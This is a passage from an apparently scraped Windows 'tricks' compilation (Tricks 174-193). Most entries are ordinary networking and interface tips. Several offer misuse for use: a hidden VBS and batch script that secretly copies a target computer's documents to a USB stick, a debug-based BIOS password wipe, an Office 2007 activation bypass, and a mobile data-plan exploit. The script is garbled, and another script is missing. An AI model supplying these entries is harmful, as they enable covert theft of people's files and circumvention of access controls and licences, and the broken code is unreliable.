Display DNS Cache Info Configuration: ipconfig /displaydns

Clear DNS Cache: ipconfig /flushdns

Release All IP Address Connections: ipconfig /release

Renew All IP Address Connections: ipconfig /renew

Re-Register the DNS connections: ipconfig /registerdns

Display DHCP Class Information:ipconfig /showclassid

Change/Modify DHCP Class ID: ipconfig /setclassid

Network Connections: control netconnections

Network Setup Wizard: netsetup.cpl

Test Connectivity: ping

Trace IP address Route: tracert

Displays the TCP/IP protocol sessions: netstat

Display Local Route: route

Display Resolved MAC Addresses: arp

Display Name of Computer Currently on: hostname

it ll b display more commands when u type ipconfig/? in command prompt




Trick-174
Hidden password generator in Windows
XP

These days it seems as though everybody is a computer security expert, or
needs to be anyway. Picking a good strong password is always a challenge,
and there are many online services that will generate you a very strong
password with letters, numbers, misc characters ($%*&#@!), etc, but did you
know Windows XP has a built-in password generator of its own?

The folks over at Microsoft didnt really make this feature very obvious to find,
namely as it is more of a computer administrator tool than for something a
regular joe would need, but I dont understand why. Something like this would
be very useful, especially if you share a single PC, or have a number of
computers on a network which contain sensitive data, or with the potential for
its security to be breached.

So, how do you find and use it? Simple:
Go to Run on the Start menu and type cmd (without the quotes)
a dos command prompt window will open.
At the command prompt type net user administrator /random (without the
quotes)

Based upon Windows XPs on security rules, it will generate you a fairly solid
password for you to use, that will at least be harder to crack
Trick-175
Fix for Generic Host Error

Symptoms:
* You are surfing the internet or are engaged any type of Internet activity
when suddenly all your Network activity goes to hault. You can still see the
Internet connected icon in the tray but you cannot surf, browse or do
anything.
* You get an error message something like "Generic Host Process for Win32
Services has encountered a problem and needs to close. We are sorry for the
inconvenience."
* Error message reporting about faulting netapi32.dll and svchost.exe.
* You try to disconnect your Internet because of no activity observed but the
Internet icon wont disappear.
* You recieve an error message something like "Your PC has recovered from
a serious problem" etc.
Solution:

Follow these simple steps and your Windows will be fully cured of this
menace
Close Port 445:
1. Start Registry Editor (Regedit.exe) by clicking Start menu, and then click
the Run icon.
2. In the small box that Opens, type: regedit then click the OK button. The
Registry Editor will now have opened.
3. Locate the following key in the registry:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\NetBT\Parameters
In the right-hand side of the window find an option called
TransportBindName.
Double click that value, and then delete the default value, thus giving it a
blank value.

Close Port 135:
1. Then you must now navigate to the following registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
2. You will see there is a String Value called: EnableDCOM
Set the value to: N (it should currently be Y)
3. Close the Registry Editor. Shutdown and Restart your computer.

Trick-176
Pop a banner each time Windows Boots

To pop a banner which can contain any message you want to display
just before a user is going to log on, go to the key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\WinLogon Now create a new string Value in the right pane
named LegalNoticeCaption and enter the value that you want to see in
the Menu Bar. Now create yet another new string value and name it:
LegalNoticeText. Modify it and insert the message you want to display
each time Windows boots. This can be effectively used to display the
company's private policy each time the user logs on to his NT box. It's
.reg file would be: REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\Winlogon] "LegalNoticeCaption"="Caption here."
Trick-177
BSNL 3G hack (Exclusive)

Here is a 100 % working trick to unlimited use BSNL 3G at the cost of Normal
GPRS

First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be activated in 24
hours, after activation get gprs settings by calling c.care

Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to change only one thing in yor 3G enabled cell.

Go to settings>tools>settings>phone&g
t;network>network mode> now select UMTS

THEN do manual searching for network u will find bsnl 3g network there with
small 3g logo along wid its name,select it as default


Now see your data signals logo..... voila it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as ur access point
Trick-178
Hack to Activate Microsoft Office 2007
Evaluation Trial Version

Most suites or programs of Microsoft Office 2007
allows user to evaluate the product. The trial version of 2007 Microsoft Office
system can be installed by using a 25-character trial product key available from
Microsoft
while you download the free Office software, and you can use the Microsoft
Office 2007 suite or program with full functionality for 60 days.

You may have the Office 2007 CD and are able to install Office 2007 without
entering product key. However, Office 2007 will work in reduced functionality
mode, where its effectively just a viewer for Office documents. Beside, if you
forget the trial product key, or dont wish to register a Windows Live ID to get
the trial key, heres the trick to activate Office 2007, or more correctly, bypass
the activation of Office 2007 60 days trial, and making the trial word disappear
from the Office title at the top and suppress activation and trial expiry prompt.

Note that to use Microsoft Office 2007 beyond 60 days trial period, you need to
purchase a valid license for it, available from Amazon or most computer retail
store.

To use this hack to crack activation on Office 2007, you need to install Office
2007 without any serial number or product key. If you have installed Office
2007 with a product key or serial number, do the following to clean remove
Office 2007 of product key:

1. Close all Microsoft Office applications
.
2. Run Register Editor by clicking on Start -> Run, and then type regedit in the
Open box and press Enter key.
3. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\ Registration

Note that inside the registry key, there should be another subkey that
resembles the following:

HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\
Registration\{90120000-0030-0000-0000-0000000FF1CE

or

HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\
Registration\{91120000-0011-0000-0000-0000000FF1CE
4. If there is more than one registry entries or subkeys that reference Microsoft
12.0 registration, open up each subkey, and then identify the product by the
ProductName value data until you locate the subkey for the product which you
want to remove the existing product license key.

For example:

ProductName=Microsoft Office Professional Plus 2007
ProductName=Microsoft Office Enterprise 2007
5. Once found the correct registry subkey, delete the following values:

DigitalProductID
ProductID
6. Close Registry Editor.

Once Microsoft Office 2007 has been installed with no product key, proceed
with the following steps:

1. In Windows Explorer, brose to the following folder:

C:\Program Files\Common Files\Microsoft Shared\OFFICE12\Office Setup
Controller\Proof.en\
2. Right click on Proof.XML file, select Open With in the right click menu.
3. In the Open With window, select Notepad to be used to open the XML file.
In Vista, if you cant see the Notepad option, simply double click the Other
Programs to unhide it.
4. Scroll down to the bottom of the Proof.XML to locate the following lines:

</Feature> <Feature Id=SetupXmlFiles Cost=1248>
<OptionRef Id=AlwaysInstalled/>
</Feature>
5. Change the AlwaysInsalled to neverInstalled so that the line looks like
following:

<OptionRef Id=neverInstalled/>
6. Save the Proof.xml file. In Windows Vista, you may need to take ownership
and grant full access permission to yourself before able to modify the file.
7. You can now launch Microsoft Office 2007 application such as Word, Excel,
Powerpoint, Outlook and etc without prompting for activation.

As usual, as its a hack, and before you purchase a valid product key for it, you
wont be able to AND cant access any updates or Microsoft Office Online.
Trick-179
Hacking Windows Games

Minesweeper
Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper,
then type xyzzy. Next hold down either shift key for one second. Now when you
move the mouse cursor over a Minesweeper square you will see a tiny white
pixel in the top left corner of your desktop screen. This pixel will change to black
when your mouse moves over a mine. You may need to change you desktop
background to a solid color other then white or black to see the pixel.

Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get
extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to
activate the Gravity Well.
Secret - Instant PromotionInstructions - Type rmax at the start of a new game to
go up in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the
third yellow light bar so it falls back down to get 75,000 points. There are six
yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000
pointsFifth: 15,000 pointsSixth: 7,500 points
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to
activate Test Mode. No notification will be given that this is activated but you
can now left-click the mouse button and drag the ball around.
Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No
notification will be given that this is activated but when a ball is lost a new ball
will appear from the yellow wormhole indefinitely. Once this is activated you will
be unable to activate other secrets without restarting

FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game
play. Then you will be asked if you want to Abort, Retry or Ignore. Choose
Abort, then move any card to instantly win.
Secret - Hidden Game ModesInstructions - In the Game
menu choose Select Game. Enter -1 or -2 to activate the
hidden game modes.

Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.
Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card.
Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold
control and drag a card down from the deck. Click the A key
and then let go of the left mouse key. You will get 10 points for this. Continue
doing this for infinite points!
Infinite points trick II
To do this trick, finish a game of solitaire with the time bonus option on. The
cards will start bouncing. Click on the solitaire screen and the play again box
will pop up. Select no, so the solitaire screen is just blank green. Use the instant
win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game
will be added to your last games score. For example, if your time
bonus was 5000, and your final score was 6000, after using this glitch, you will
have a score of 11000. This glitch can be used as many times as you want.
Trick-180
Cracking Bios, use the following
code

Here is the best way to crack the bios password in win 95/98:
Follow the steps below:
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the
windows start up menu.
3) type the command at the prompt: "debug" (without quotes ninja.gif )
4) type the following lines now exactly as given.......
o 70 10
o 71 20
quit
exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!
EnjoYYYYYYYYYY

PS: I tested this in Award Bios........
There seems to be some issue regarding display drivers on some
machines if this is used. Just reinstall the drivers, Everything will be
fine...........
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data..........
The use of this code is entirely at ur risk.......... It worked fine for
me........
Trick-181
How to lock a folder with a
password without a software

Steps:

1- make a new folder ( name it as you like )

2- inside this folder make a ( TXT ) file & copy inside it this (the entire thing)



3- After u copy the Commanding go to line 23 (or try using shortcut- CTRL+F
and type password to locate the line) u will find this word : password here
(Change it with any password u like.) is :

eg:


4- After that go to save as & name this file as "locker.bat "

5- Now back to the folder & u will find a ( LOCKER ) commanding.
(locker.exe)

6- Double Click on it & u will find a new folder (Private )

7- Ok ,, now copy what u want in this "private Folder" & after that come out of
the folder, and Double click on locker again. It will open and ask if you want to
lock your folder? Y/N ?

8- Type Y. your private folder will dissapear.

9- If you want to UNLOCK your folder ,go to (locker) & type your pass and you
will see your private folder.

it not only hides the folder, but incase, u unhide all files... and try opening it
without entering password, it'll take u to the control panel...

Also, if u want to store files on your Pen-Drive, u can use this script. No
Software Required

Incase u delete your Locker file (just in case), then u can make a new one (but
with the same password) and open it from that.

Alternatively, u can keep this locker file somewhere else, and when u want to
open ur folder, only then bring it back to that place ..

Trick-182
Copy Files to Flashdisc Silently

1. Open notepad, create a vbs file type or copy and paste the following script:
dim wshshell, dos
wscript.createobject set wshshell = ( "wscript.shell")
dos = wshshell.expandenvironmentstr ings ( "% coms ...
wshshell.run (dos & "/ c tarik.bat"), vbhide
2. Save as all files with start.vbs name
3. Open notepad again, make a bat file type or copy and paste the following
script:
@ echo off
mkdir% computername%
xcopy "C: \ Documents and Settings \% username% \ My Documents \ *.
jpg"% computername% / s / c / q / r
@ cls
@ exit
4. Save the file name tarik.bat save as type select all files.
Bat file name should be in accordance with the vbs script file line to four
(tarik.bat)
Save the file in the flash disk, copy files to the target computer secretly run
(2x click) file start.vbs.
Vbs file function (start.vbs) function to run a bat file (tarik.bat) secretly term
or background process. While the bat file (tarik.bat) function to run the copy
all files with a certain extensions in the target computer.
Example above is a copy of all the files jpg extension(image file) is in the My
Documents folder on the target computer (see the third line script bat file) and
saved into the flash disk into the appropriate folder with the name of the
target computer. you can edit their own page on the second file format as
needed files and folders on the target you will copy.
Please see the path of the target computer file. You have to change it
accordingly
Trick-183
Megaupload Download Trick,
skip timer and captchas.100%
working..

If you want to download from Megaupload without captchas or countdown
timers, here is a trick worth trying out. It helps to convert megaupload links into
direct download links.
Megaupload Direct Download Link Generator

If you are having a download link from megaupload like
Quote:
http://www.megaupload.com/?d=GVOMXHQ2
then convert it to
Quote:
http://www.megaupload.com/mgr_dl.php?d=GVOMXHQ2
That is, just place "/mgr_dl.php?" just after the ".com/"

You can place this direct link in download managers for immediate downloads
from megaupload.

No Coundown

No Captchas

Maximum Speed

FAQ---
Q-Not working!!!
A-A script on this page may be busy, or it may have stopped responding. You
can stop the script now, or you can continue to see if the script will complete.

I got that error, and it said I already downloaded when I haven't. Weird.
Use a download manager to use this trick.. like DownThemAll! or orbit..
Trick-184
How to open office 2007 files into
Office 2003?

Today tip will help you to resolve the compatibility issues between the Office
2003 and Office 2007. Because all programs in office 2003 used the old file
extensions for its different programs. For example Word 2003 saved files with
extension .doc, Excel 2003 with .xls and PowerPoint with .ppt. but on the other
office 2007 used the new file extensions for its different programs. For example
Word 2007 saved files with extension .docx, Excel 2007 with .xlsx and
PowerPoint with .pptx. Now the problem is that when you will try to open office
2007 files into office 2003 and you will not open the file due to compatibility
issues between both office versions. Microsoft provides a free compatibility
pack to convert office 2007 documents to the office 2003 format. There are
many third party free converter are available but here we are using Microsoft
office compatibility pack.
Follow the given steps to download free Microsoft compatibility pack and install
it.
To use this feature, you will need to be logged into your computer with
administrative rights.
Visit the following link to download the Microsoft compatibility pack:
http://www.microsoft.com/downloads/d...displaylang=en

When you have downloaded the file, double click on FileFormatConverter.exe
file to start the installation.
Trick-185
Enable or disable Scandisk/Chkdsk
on system reboot
If you disable the automatic execution of Scandisk (Win98, ME) or Chkdsk
(Win2K, XP), you should run it manually about every two weeks to maintain
the integrity of your PC's file system
Windows XP
Start>Run>chkntfs /x <drive> [drive] [drive]
For example, if you want to disable Chkdsk from running on drive C: chkntfs
/x c:
Chkntfs works by modifying the BootExecute value in the Registry.
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTR
OL\Session Manager
The default value is BootExecute:REG_MULTI_SZ:autocheck autochk *
Chkdsk /f /r is unaffected by chkntfs and can be run to check volumes
manually on the next system reboot.

Windows 98/ME
Start>Run>Msconfig>Advanced>Disable Scandisk after bad shutdown
Win98:
If you prefer to play with the Msdos. sys file:
Add AutoScan=0 to the [Options] section.
WinMe: If you prefer to play with the Registry:
Key:
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
]
Value Name: DisableScandiskOnBoot
Data Type: REG_BINARY
Value Data: 01

Trick-186
Some Of Windows 7 Tricks and
Secrets
#1 Windows Management. By now, youve probably seen that
Windows 7 does a lot to make window management easier: you can
dock a window to the left or right half of the screen by simply
dragging it to the edge; similarly, you can drag the window to the top of
the screen to maximize it, and double-click the window top / bottom
border to maximize it vertically with the same horizontal width. What
you might not know is that all these actions are also available with
keyboard shortcuts:

* Win+Left Arrow and Win+Right Arrow dock;
* Win+Up Arrow and Win+Down Arrow maximizes and restores /
minimizes;
* Win+Shift+Up Arrow and Win+Shift+Down Arrow maximizes and
restores the vertical size.

This side-by-side docking feature is particularly invaluable on
widescreen monitors it makes the old Windows way of shift-clicking
on two items in the taskbar and then using the context menu to
arrange them feel really painful





#2 Cut Out The Clutter. Working on a document in a window and want
to get rid of all the extraneous background noise? Simply hit
Win+Home to minimize all the non-active background windows,
keeping the window youre using in its current position. When youre
ready, simply press Win+Home again to restore the background
windows to their original locations.




3.# Multi-Monitor Windows Management. The earlier tip on window
management showed how you can dock windows within a monitor.
One refinement of those shortcuts is that you can use Win+Shift+Left
Arrow and Win+Shift+Right Arrow to move windows from one monitor
to another keeping them in the same relative location to the
monitors top-left origin.




4.# Command Junkies Only. One of the most popular power toys in
Windows XP was Open Command Prompt Here, which enabled you
to use the graphical shell to browse around the file system and then
use the context menu to open a command prompt at the current
working directory. In Windows 7 (and in Windows Vista, incidentally
although not many folk knew about it), you can simply hold the Shift
key down while selecting the context menu to get exactly the same
effect. If the current working directory is a network location, it will
automatically map a drive letter for you.




#5 Its a Global Village. If youve tried to change your desktop
wallpaper, youve probably noticed that theres a set of wallpapers
there that match the locale you selected when you installed Windows.
(If you picked US, youll see beautiful views of Crater Lake in Oregon,
the Arches National Park, a beach in Hawaii, etc.) In fact, there are
several sets of themed wallpapers installed based on the language
you choose, but the others are in a hidden directory. If youre feeling in
an international mood, simply browse to
C:\Windows\Globalization\MCT and youll see a series of pictures
under the Wallpaper directory for each country. Just double-click on
the theme file in the Theme directory to display a rotation through all
the pictures for that country. (Note that some countries contain a
generic set of placeholder art for now.)





#6 The Black Box Recorder. Every developer wishes there was a way
that an end-users could quickly and simply record a repro for the
problem that theyre running into that is unique to their machine.
Windows 7 comes to the rescue! Part of the in-built diagnostic tools
that we use internally to send feedback on the product, the Problem
Steps Recorder provides a simple screen capture tool that enables
you to record a series of actions. Once you hit record, it tracks your
mouse and keyboard and captures screenshots with any comments
you choose to associate alongside them. Once you stop recording, it
saves the whole thing to a ZIP file, containing an HTML-based slide
show of the steps. Its a really neat little tool and I cant wait for it to
become ubiquitous on every desktop! The program is called psr.exe;
you can also search for it from Control Panel under Record steps to
reproduce a problem.



Trick-187
Amazing YouTube Tricks

1. View high quality videos
Youtube gives you the option to switch to high quality videos for some of the
videos, however you can check if a video is available in high quality format by
appending `&fmt=18'(stereo, 480 x 270 resolution) or `&fmt=22'(stereo, 1280
x 720 resolution) for even higher quality.

2. Embed Higher Quality Videos
While the above trick works for playback, if however you want to embed hig
quality videos you need to append "&ap=%2526fmt%3D18" and
"&ap=%2526fmt%3D22" to the embed url.

3. Cut the chase and link to the interesting part
Linking to a video where the real action starts at 3 minutes 22 seconds,
wondered if you could make it start at 03:22? You are in luck. All you have to
do is add #t=03m22s (#t=XXmYYs for XX mins and YY seconds) to the end of
the URL.

4. Hide the search box
The search box appears when you hover over an embedded video. To hide the
search box add `&showsearch=0' to the embed url.

5. Embed only a part of Video
Just append `&start=30' to skip first 30s of the video. In general you can
modify the value after start= to the number of seconds you want to skip the
video for.

6. Autoplay an embedded video
Normally when you embed a Youtube video and load the page, the player is
loaded and it sits there waiting for you to hit the play button. You can make the
video play automatically by adding `&autoplay=1' to the url part of the embed
code.

7. Loop an embedded video
Append `&loop=1' to make the video start again without user intervention after
it reaches the end.

8. Disable Related Videos
Publishing your content in the form of Youtube video? Dont want people to see
other peoples content that may be related but may as well be in competition to
you? Just add `&rel=0' to the end of the url part of the embed code and you
just turned off the related video suggestions!

9. Bypass Youtube Regional Filtering
Some videos are only available in certain parts of the world. Your IP Address is
used to determine your location and then allow or deny access to the video.
Change the url from http://www.youtube.com/watch?v=<somecode> to
http://www.youtube.com/v/<somecode>

10. Download Video
Although not inherently a youtube trick but useful all the same for downloading
videos. Just change youtube to kickyoutube in the url of the video and it will
take you to kickyoutube.com with all the options for downloading the video you
were watching.
Trick-188
How To Record The Time You
Spend Online In Firefox
The TimeTracker plugin
for Firefox gives you the posibility to track the time you spend directly in front of
your browser in a easy way. The timer only counts if you are browsing, pauses
automatically when you stop browsing. If you want you can even exclude work-
related sites from the counter.

After you install the plugin a little timer will appear in the lower right-hand corner
of your Firefox browser.

If you right-click on the clock, you'll get a menu where you can Reset the timer
or go to the Options page.

In the Options page, you can choose since when you want to be tracked, idle
timeout, exclude sites and when you want the counter to pause.

You can disable the seconds counter because it can be very annoying for
your eyes.

Download TimeTracker plugin for Firefox
Trick-189
Understanding Windows 7's 'GodMode'


Although its name suggests perhaps even grander capabilities, Windows
enthusiasts are excited over the discovery of a hidden "GodMode" feature that
lets users access all of the operating system's control panels from within a
single folder.

By creating a new folder in Windows 7 and renaming it with a certain text
string at the end, users are able to have a single place to do everything from
changing the look of the mouse pointer to making a new hard-drive partition.

The trick is also said to work in Windows Vista, although some are warning
that although it works fine in 32-bit versions of Vista, it can cause 64-bit
versions of that operating system to crash.

To enter "GodMode," one need only create a new folder and then rename the
folder to the following:
Quote:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
Once that is done, the folder's icon will change to resemble a control panel
and will contain dozens of control options. it is a handy way to get to all kinds
of controls.
Trick-190

How to Remove the Popup Ads in Avira
Antivirus Free Edition

Windows 2000 / Windows XP Pro
1. Go to Start > Run.
2. Type gpedit.msc and click OK.
3. Navigate through User Configuration > Administrative Templates
> System.
4. Double click "Don't run specified Windows applications".
5. Enable it and click show.
6. Add "avnotify.exe".
7. Click OK on all open windows.
8. Restart.

Windows 7 or Windows Vista Business/Ultimate
1. Open the control panel through Start > Control Panel.
2. Go to Administrative Tools > Local security policy.
3. Click on Software Restriction Policy > Action > Create new restriction
policy.
4. Right-click, and go to additional rules > new path rule.
5. Click Browse and navigate to C:\Program Files\Avira\AntiVir Desktop\ and
double-click avnotify.exe.
6. Set the security level to Disallowed.
7. Click apply and OK.

Windows Vista Home 64-Bit
1. Go to C:\Program Files (x86)\Avira\AntiVir Desktop\avnotify.exe for the
current version, 9. For earlier versions, go to C:\Program
Files\Avira\AntiVir PersonalEdition Classic\avnotify.exe.
2. Right-click avnotify.exe and go to Properties > Security.
3. Under the group or username SYSTEM, click edit.
4. Put a checkmark under the DENY column for "read and execute".

Windows Vista Home 32-Bit
1. Go to C:\Program Files\Avira\AntiVir Desktop\avnotify.exe for the current
version, 9. For earlier versions, go to C:\Program Files\Avira\AntiVir
PersonalEdition Classic\avnotify.exe.
2. Right-click avnotify.exe and go to Properties > Security.
3. Under the group or username SYSTEM, click edit.
4. Put a checkmark under the DENY comlumn for "read and execute".
Trick-191
Share internet between pc and main PC take
internet from Mobile

To use Internet Connection Sharing to share your Internet connection,
the host computer must have one network adapter that is configured to
connect to the internal network, and one network adapter or modem
that is configured to connect to the Internet.
On the host computer
On the host computer, follow these steps to share the Internet
connection:
1. Log on to the host computer as Administrator or as Owner.
2. Click Start, and then click Control Panel.
3. Click Network and Internet Connections.
4. Click Network Connections.
5. Right-click the connection that you use to connect to the Internet.
For example, if you connect to the Internet by using a modem, right-
click the connection that you want under Dial-up.
6. Click Properties.
7. Click the Advanced tab.
8. Under Internet Connection Sharing, select the Allow other network
users to connect through this computer's Internet connection check
box.
9. If you are sharing a dial-up Internet connection, select the Establish
a dial-up connection whenever a computer on my network attempts to
access the Internet check box if you want to permit your computer to
automatically connect to the Internet.
10. Click OK. You receive the following message:
When Internet Connection Sharing is enabled, your LAN adapter will
be set to use IP
address 192.168.0.1. Your computer may lose connectivity with other
computers on your network. If these other computers have static IP
addresses, it is a good idea to set them to obtain their IP addresses
automatically. Are you sure you want to enable Internet Connection
Sharing?
11. Click Yes.
The connection to the Internet is shared to other computers on the
local area network (LAN). The network adapter that is connected to the
LAN is configured with a static IP address of 192.168.0.1 and a subnet
mask of 255.255.255.0

On the client computer
To connect to the Internet by using the shared connection, you must
confirm the LAN adapter IP configuration, and then configure the client
computer. To confirm the LAN adapter IP configuration, follow these
steps:
1. Log on to the client computer as Administrator or as Owner.
2. Click Start, and then click Control Panel.
3. Click Network and Internet Connections.
4. Click Network Connections.
5. Right-click Local Area Connection, and then click Properties.
6. Click the General tab, click Internet Protocol (TCP/IP) in the This
connection uses the following items list, and then click Properties.
7. In the Internet Protocol (TCP/IP) Properties dialog box, click Obtain
an IP address automatically (if it is not already selected), and then
click OK.

Note You can also assign a unique static IP address in the range of
192.168.0.2 to 192.168.0.254. For example, you can assign the
following static IP address, subnet mask, and default gateway:
IP Address 192.168.0.2
Subnet mask 255.255.255.0
Default gateway 192.168.0.1
8. In the Local Area Connection Properties dialog box, click OK.
9. Quit Control Panel.
If client machine having windows 98 and then stop here..
If client machine having windows xp then
10. Enter DNS server address (u can find it in main gateway PC using
run>cmd>ipconfig /all )
11. DNS server name you have to enter in TCP/IP setting..
Trick-192
Finding IP Address Of the Sender In
Hotmail, Yahoo, Gmail

When you receive an email, you receive more than just the message. The email
comes with headers that carry important information that can tell where the
email was sent from and possibly who sent it. For that, you would need to find
the IP address of the sender. The tutorial below can help you find the IP
address of the sender.

Finding IP Address Of the Sender In Hotmail
# Log into your Hotmail account with your username and password.
# Click on the Mail tab on the top.
# Open the mail.
# If you do not see the headers above the mail message, your headers are not
displayed . To display the headers,

* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked.
* Click on Ok button
* Go back to the mails and open that mail.

# If you find a header with X-Originating-IP: followed by an IP address, that is
the sender's IP address

* Hotmail headers : dbilla ,In this case the IP address of the sender is
[68.34.60.59]. This is be the IP address of the sender.

# If you find a header with Received: from followed by a Gmail proxy like this

* Hotmail headers : dbilla
* Look for Received: from followed by IP address within square brackets[]. In
this case, the IP address of the sender is [69.140.7.58].

# Or else if you have headers like this

* Hotmail headers : dbilla
* Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] .

# If you have multiple Received: from headers, eliminate the ones that have
proxy.anyknownserver.com.


Finding IP Address of the sender in Yahoo Mail
# Log into your Yahoo! mail with your username and password.
# Click on Inbox or whichever folder you have stored your mail.
# Open the mail.
# If you do not see the headers above the mail message, your headers are not
displayed . To display the headers,

* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail.

# You should see similar headers like this:

* Yahoo! headers : dbilla

# Look for Received: from followed by the IP address between square brackets
[ ]. Here, it is 202.65.138.109.
# That is be the IP address of the sender!

Finding IP Address of the sender in Gmail
* Log into your Gmail account with your username and password.
* Open the mail.
* To display the headers,
o Click on More options corresponding to that thread. You should get a bunch
of links. Click on Show original
* You should get headers like this:
o Gmail headers : dbilla
* Look for Received: from followed by a few hostnames and an IP address
between square brackets. In this case, it is 65.119.112.245.
* That is be the IP address of the sender!!
Trick-193
Start ur system automatic by
time

Many of u have night unlimited connection and want to schedule the
machine by night so that u dont have to wake up by night.

U can make ur system to turn up automatically.

Steps:
1. Go to bios
2. Go to power tab
3. There u will found options as follows
wake up from s5----------------intel mb
wake up from irc alram------asus
4. Enable the option
5. Give ethe specified time
6. Press f10

u r done.. Now just schedule ur dialer by putting them on startup by
night and also if u desire to have torrent download put it also at start
up.
Make the main power on and keep monitor off
have ur download by morning

Das könnte Ihnen auch gefallen